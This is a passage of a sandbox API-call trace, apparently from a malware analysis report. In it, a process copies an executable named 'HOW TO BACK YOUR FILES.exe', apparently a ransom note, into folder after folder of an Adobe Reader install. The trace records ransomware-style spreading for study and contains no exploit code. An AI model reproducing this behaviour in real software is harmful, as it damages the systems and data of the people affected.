| out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81da7fe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5600a820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5600a820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.236] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.236] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.236] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU" [0061.236] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1b88 | out: hHeap=0x2b0000) returned 1 [0061.236] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0061.236] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU") returned 57 [0061.236] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU" [0061.236] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.237] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\enu\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.241] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.241] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81da7fe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5600a820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5600a820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.242] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.242] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.242] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU" [0061.242] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1b08 | out: hHeap=0x2b0000) returned 1 [0061.242] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0061.242] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU") returned 57 [0061.242] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU" [0061.242] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.242] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\deu\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.247] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.247] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81df42a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x56030980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56030980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.247] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.247] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.247] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN" [0061.247] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1a88 | out: hHeap=0x2b0000) returned 1 [0061.247] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0061.247] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN") returned 57 [0061.247] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN" [0061.247] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.247] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\dan\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.252] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.252] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81dce140, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x56030980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56030980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.252] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.253] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.253] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE" [0061.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1a08 | out: hHeap=0x2b0000) returned 1 [0061.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0061.253] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE") returned 57 [0061.253] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE" [0061.253] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.253] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cze\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.256] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.256] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81cc37a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x56030980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56030980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.257] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.257] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.257] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT" [0061.257] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1988 | out: hHeap=0x2b0000) returned 1 [0061.257] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0061.257] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT") returned 57 [0061.257] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT" [0061.257] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.257] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cht\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.260] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.260] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81df42a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x56056ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56056ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.261] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.261] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.261] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS" [0061.261] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1908 | out: hHeap=0x2b0000) returned 1 [0061.261] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0061.261] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS") returned 57 [0061.261] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS" [0061.261] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.261] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\chs\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.266] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.266] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81df42a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x56056ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56056ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.266] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.266] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.266] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT" [0061.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1888 | out: hHeap=0x2b0000) returned 1 [0061.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0061.266] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT") returned 57 [0061.266] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT" [0061.267] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.267] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cat\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.270] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.270] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81efec40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x56056ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56056ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.270] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.270] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.270] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts" [0061.270] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1688 | out: hHeap=0x2b0000) returned 1 [0061.270] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0061.270] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts") returned 59 [0061.270] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts" [0061.270] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.270] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\javascripts\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.274] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.274] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5607cc40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5607cc40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.275] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.275] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.275] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates" [0061.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0061.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0061.275] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates") returned 59 [0061.275] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates" [0061.275] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.275] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.281] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.281] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5607cc40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5607cc40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.282] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.282] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.282] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR" [0061.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0ea8 | out: hHeap=0x2b0000) returned 1 [0061.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0061.282] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR") returned 63 [0061.282] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR" [0061.282] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.282] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.297] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.297] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80861b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5607cc40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5607cc40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.297] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.297] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.297] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR" [0061.297] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0e20 | out: hHeap=0x2b0000) returned 1 [0061.297] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR" [0061.297] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.297] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\tur\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.301] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.301] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x809de900, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x560a2da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, 